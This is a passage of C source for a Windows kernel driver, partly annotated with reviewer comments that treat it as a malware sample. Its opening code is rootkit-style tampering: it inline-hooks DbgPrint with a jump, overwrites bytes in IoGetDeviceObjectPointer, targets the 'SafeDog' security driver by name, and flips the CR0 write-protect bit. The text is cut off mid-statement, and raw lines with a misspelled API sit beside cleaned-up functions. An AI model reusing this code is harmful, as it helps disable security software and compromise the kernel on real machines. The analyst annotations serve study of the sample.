*(ULONG*)((ULONG)recover+9)=*(ULONG*)MmUserProbeAddress; pointer=(ULONG)recover; for(i=0;i<13;i++,foundaddr++,pointer++) *(unsigned char*)foundaddr=*(unsigned char*)pointer; }
RtlInITUnicodeString(&safedog,L"\\Driver\\SafeDog"); if ( !ObReferenceObjectByName(&safedog, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &dogdrv)) { if(dogdrv) {
iopointer=(ULONG)IoGetDeviceObjectPointer; *(unsigned char*)(iopointer)=0x8b; *(unsigned char*)(iopointer+1)=0xff; *(unsigned char*)(iopointer+2)=0x55; *(unsigned char*)(iopointer+3)=0x8b; *(unsigned char*)(iopointer+4)=0xec;
} } dbgpoint=(ULONG)DbgPrint;//inline DbgPrint() retaddr=dbgpoint+5; *(unsigned char*)dbgpoint=0xE9; *(ULONG*)((ULONG)dbgpoint+1)=(ULONG)MyDbgPrint-(ULONG)dbgpoint-5;
__asm { mov eax, CR0 or eax, NOT 0FFFEFFFFh mov CR0, eax } }
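/*
 * Dispatch - catch-all IRP handler for this driver's device object.
 *
 * Completes the request immediately and reports success. It does not look
 * at the major function code, the request buffers, or the caller, so any
 * request routed here succeeds unconditionally.
 * NOTE(review): which major functions are routed here is set up in
 * DriverEntry, which is not fully visible -- confirm there.
 *
 * DeviceObject  Device the request was sent to (not used).
 * Irp           Request to complete.
 *
 * Returns 0 (STATUS_SUCCESS).
 */
NTSTATUS Dispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    /*
     * A dispatch routine has to fill in the I/O status block before
     * completing the IRP; the original completed it without doing so, so
     * the status seen by the requester depended on whatever the IRP
     * already contained.
     */
    Irp->IoStatus.Status = 0;          /* STATUS_SUCCESS */
    Irp->IoStatus.Information = 0;     /* no bytes transferred */

    IofCompleteRequest(Irp, 0);        /* 0 == IO_NO_INCREMENT */
    return 0;
}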
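/*
 * DriverUnload - tears down the objects this driver exposes.
 *
 * Deletes the \DosDevices symbolic link and then the device object hanging
 * off the driver object.
 *
 * NOTE(review): nothing here reverts the in-memory patches applied earlier
 * in this file (the 0xE9 jump written over DbgPrint points at MyDbgPrint
 * inside this image, and bytes are written into IoGetDeviceObjectPointer).
 * After an unload those kernel routines would still carry the modified
 * bytes; for an analyst, this fixed device/link name is a stable host
 * indicator for the sample.
 *
 * DriverObject  Driver object being unloaded.
 */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING SymbolicLinkName;

    /*
     * The listing spelled this call "RtlInITUnicodeString"; C identifiers
     * are case-sensitive and the kernel routine is RtlInitUnicodeString.
     * The name must match the link created in DriverEntry.
     */
    RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\32ef43d02471c26e");
    IoDeleteSymbolicLink(&SymbolicLinkName);

    /* Skip the delete when no device object is attached to the driver. */
    if (DriverObject->DeviceObject) {
        IoDeleteDevice(DriverObject->DeviceObject);
    }
}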
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {
PDEVICE_OBJECT DeviceObject; UNICODE_STRING DeviceName; UNICODE_STRING SymbolicLinkName; RtlInITUnicodeString(&DeviceName,L"\\Device\\32ef43d02471c26e");//随机生成的路径 RtlInITUnicodeString(&SymbolicLinkName,L"\\DosDevices\\32ef43d02471c26e"); if ( !IoCreate